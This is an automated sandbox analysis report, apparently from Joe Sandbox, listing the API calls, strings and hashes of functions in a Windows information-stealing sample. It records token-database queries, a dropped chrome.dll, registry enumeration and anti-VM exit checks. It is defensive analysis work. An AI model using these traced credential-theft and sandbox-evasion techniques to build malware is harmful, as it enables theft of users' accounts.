                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A560: memcmp.MSVCRT(?,v20,00000003), ref: 0040A57D
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BC6F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2
                                                                                                                                                                                                                                                                                                                                  • StrStrA.SHLWAPI(00000000,AccountId), ref: 0040BC9D
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BD75
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000), ref: 0040BD89
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcpy$lstrlen$lstrcat$AllocLocalmemcmp
                                                                                                                                                                                                                                                                                                                                  • String ID: AccountId$AccountTokens$AccountTokens$SELECT service, encrypted_token FROM token_service
                                                                                                                                                                                                                                                                                                                                  • API String ID: 1440504306-1079375795
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: cf8c167f7f5d0f3e06df832fa87c203bbe2993046c3c8b6939726ac0c29ee09e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 6476b4a2e47316619015001d7be3bff7ad81932ea7eb7605c7a9cb508b765a87
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: cf8c167f7f5d0f3e06df832fa87c203bbe2993046c3c8b6939726ac0c29ee09e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9B17371A111089BCB04FBA1DCA6EEE7339AF14314F40456FF50673195EF386A98CB6A
                                                                                                                                                                                                                                                                                                                                  Function 004108A0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 255fileCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,004108DC,C:\ProgramData\chrome.dll), ref: 00419871
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0040A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll,?,004108E4), ref: 0040A098
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0079D508), ref: 00410922
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0079D458), ref: 00410B79
                                                                                                                                                                                                                                                                                                                                  • StrCmpCA.SHLWAPI(00000000,0079D588), ref: 00410A0C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00410C35
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  • C:\ProgramData\chrome.dll, xrefs: 00410C30
                                                                                                                                                                                                                                                                                                                                  • C:\ProgramData\chrome.dll, xrefs: 004108CD
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Filelstrcpy$CreateDeleteLibraryLoad
                                                                                                                                                                                                                                                                                                                                  • String ID: C:\ProgramData\chrome.dll$C:\ProgramData\chrome.dll
                                                                                                                                                                                                                                                                                                                                  • API String ID: 585553867-663540502
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b46ed5d7fb3039007ff930ab9cd3808b3232c65d42fc4785dfef73cd692aa93e
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 798b8003b846a09b6b7b20e33334a9dbf0f3b1503011c00658a7b4d9c0c3a9bc
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b46ed5d7fb3039007ff930ab9cd3808b3232c65d42fc4785dfef73cd692aa93e
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCA176717001089FCB18EF65D996FED7776AF94304F10812EE40A5F391EB349A49CB9A
                                                                                                                                                                                                                                                                                                                                  Function 004149D0 Relevance: 10.6, APIs: 7, Instructions: 101stringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A0A10,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00414A2B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418F70: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418F9B
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414A51
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00414A70
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00414A84
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007993A8), ref: 00414A97
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,?), ref: 00414AAB
                                                                                                                                                                                                                                                                                                                                  • lstrcatA.KERNEL32(?,007A0C70), ref: 00414ABF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00418F20: GetFileAttributesA.KERNEL32(00000000,?,00410277,?,00000000,?,00000000,00420DB2,00420DAF), ref: 00418F2F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004147C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 004147D0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004147C0: HeapAlloc.KERNEL32(00000000), ref: 004147D7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004147C0: wsprintfA.USER32 ref: 004147F6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004147C0: FindFirstFileA.KERNEL32(?,?), ref: 0041480D
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: lstrcat$FileHeap$AllocAttributesFindFirstFolderPathProcesslstrcpywsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 167551676-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: 0341c4a163d27b72083479331046f27d3d988f79cbe11048bd28c5961f22f585
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: a5c2d428b28de13255d2ac7946ab4b1842291e6be0275f36c7222d1bbee1b90f
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0341c4a163d27b72083479331046f27d3d988f79cbe11048bd28c5961f22f585
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F93160B2D0421867CB14FBB0DC95EDD733EAB48704F40458EB20596091EE78A7C8CB99
                                                                                                                                                                                                                                                                                                                                  Function 00416C90 Relevance: 10.6, APIs: 7, Instructions: 89sleepCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,0079B8A0), ref: 00419BF1
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,0079B8B8), ref: 00419C0A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,0079B7C8), ref: 00419C22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,0079BBE8), ref: 00419C3A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,0079BE88), ref: 00419C53
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,00796040), ref: 00419C6B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,007946E0), ref: 00419C83
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,00794980), ref: 00419C9C
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,0079BC00), ref: 00419CB4
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,0079BBA0), ref: 00419CCC
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,0079BDB0), ref: 00419CE5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,0079BD80), ref: 00419CFD
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,007949A0), ref: 00419D15
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00419BB0: GetProcAddress.KERNEL32(75900000,0079BD68), ref: 00419D2E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004011D0: ExitProcess.KERNEL32 ref: 00401211
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401160: GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,00416CB7,00420AF3), ref: 0040116A
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401160: ExitProcess.KERNEL32 ref: 0040117E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000,?,?,00416CBC), ref: 0040112B
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401110: VirtualAllocExNuma.KERNEL32(00000000,?,?,00416CBC), ref: 00401132
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401110: ExitProcess.KERNEL32 ref: 00401143
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0040123E
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401258
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401220: __aulldiv.LIBCMT ref: 00401266
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401220: ExitProcess.KERNEL32 ref: 00401294
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00416A10: GetUserDefaultLangID.KERNEL32(?,?,00416CC6,00420AF3), ref: 00416A14
                                                                                                                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32 ref: 00416CC6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00401190: ExitProcess.KERNEL32 ref: 004011C6
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004179E0: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,004011B7), ref: 00417A10
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004179E0: HeapAlloc.KERNEL32(00000000,?,?,?,004011B7), ref: 00417A17
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 004179E0: GetUserNameA.ADVAPI32(00000104,00000104), ref: 00417A2F
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417A70: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00416CCB), ref: 00417AA0
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417A70: HeapAlloc.KERNEL32(00000000,?,?,?,00416CCB), ref: 00417AA7
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 00417A70: GetComputerNameA.KERNEL32(?,00000104), ref: 00417ABF
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15
                                                                                                                                                                                                                                                                                                                                  • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,0079D738,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416D6A
                                                                                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416D88
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00416D99
                                                                                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(00001770), ref: 00416DA4
                                                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,?,0079D738,?,004210F4,?,00000000,?,004210F8,?,00000000,00420AF3), ref: 00416DBA
                                                                                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00416DC2
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: AddressProc$Process$Exit$Heap$AllocUserlstrcpy$CloseDefaultEventHandleName__aulldiv$ComputerCreateCurrentGlobalInfoLangMemoryNumaOpenSleepStatusSystemVirtuallstrcatlstrlen
                                                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3511611419-0
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: f72a163126e658aff363df40dd71dd2de89e0ad12b9bbe3eba0df8cf6158bcd0
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 27cf1f4c78a26a12fad1801110170cb785a0876a7ac7b1f74ab5ff3c6832b849
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f72a163126e658aff363df40dd71dd2de89e0ad12b9bbe3eba0df8cf6158bcd0
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CB315E30A05104ABCB04FBF1EC56BEE7379AF44314F50492FF11266196EF786A85C66E
                                                                                                                                                                                                                                                                                                                                  Function 0041856C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64registrystringCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 004185B6
                                                                                                                                                                                                                                                                                                                                  • wsprintfA.USER32 ref: 004185E9
                                                                                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 0041860B
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0041861C
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00418629
                                                                                                                                                                                                                                                                                                                                    • Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6
                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,007A0860,00000000,000F003F,?,00000400), ref: 0041867C
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 00418691
                                                                                                                                                                                                                                                                                                                                  • RegQueryValueExA.KERNEL32(00000000,007A0848,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00420B3C), ref: 00418729
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.KERNEL32(00000000), ref: 00418798
                                                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 004187AA
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2588602641.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000648000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.0000000000668000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2588602641.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_400000_hwWxZRwpeL.jbxd
                                                                                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                                                  • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                                                                                                                                                                                                                                                                                                                  • String ID: %s\%s
                                                                                                                                                                                                                                                                                                                                  • API String ID: 3896182533-4073750446
                                                                                                                                                                                                                                                                                                                                  • Opcode ID: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                                                                                                                                                                                                                                                                                                                  • Instruction ID: 130e8712b2d17d0f4a3aa70f9b32a38deb323cc32c4c6a80807e33934adfa5f1
                                                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b35235786b948e0e6555158c1c0efb0b11028fcec8c55c6120cd3185db22f78a
                                                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0F211B71A112189BDB24DB54DC85FE9B3B9FB48704F1081D9E609A6180DF746AC5CF98
                                                                                                                                                                                                                                                                                                                                  Function 00404800 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60stringnetworkCOMMON
                                                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 0040483A
                                                                                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404851
                                                                                                                                                                                                                                                                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404868
                                                                                                                                                                                                                                                                                                                                  • lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404889
                                                                                                                                                                                                                                                                                                                                  • InternetCrackUrlA.WININET(00000000,00000000), ref: 00404899
                                                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                                                  Memory Dump Source
